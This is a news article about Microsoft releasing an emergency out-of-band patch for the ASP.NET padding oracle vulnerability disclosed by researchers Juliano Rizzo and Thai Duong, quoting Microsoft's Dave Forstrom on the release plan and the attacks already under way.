Microsoft on Tuesday will release an emergency out-of-band patch for the ASP.NET padding oracle attack that was disclosed earlier this month. The patch will only be available on the company’s Download Center for the time being, however.
The company is taking the step of releasing an emergency fix for the bug because of the seriousness of the vulnerability–which potentially affects millions of Web applications–and the fact that there are attacks ongoing against it already. The patch will fix the flaw in all versions of the .NET framework.
“Based on our comprehensive monitoring of the threat landscape, we
have determined an out-of-band release is needed to protect customers as
we have seen limited attacks and continued attempts to bypass current
defenses and workarounds,” Microsoft security official Dave Forstrom said in a blog post on the emergency patch.
“The security update is fully tested and ready for release, but will be made available initially only on the Microsoft Download Center.
This enables us to get the update out as quickly as possible, allowing
administrators with enterprise installations, or end users who want to
install this security update manually, the ability to test and update
their systems immediately. We strongly encourage these customers to
visit the Download Center, download the update, test it in their
environment and deploy it as soon as possible.”
Microsoft plans to release the ASP.NET patch through Windows Update and Windows Server Update within the next week.
Although Microsoft issued guidance about workarounds to defend against attacks on the ASP.NET bug shortly after the researchers publicly disclosed it, the researchers, Juliano Rizzo and Thai Duong, said that the workarounds did not fully protect users against their attack. The technique enables an attacker to compromise encrypted data in a Web application, including stored cookies, and also forge authentication tickets for a target application.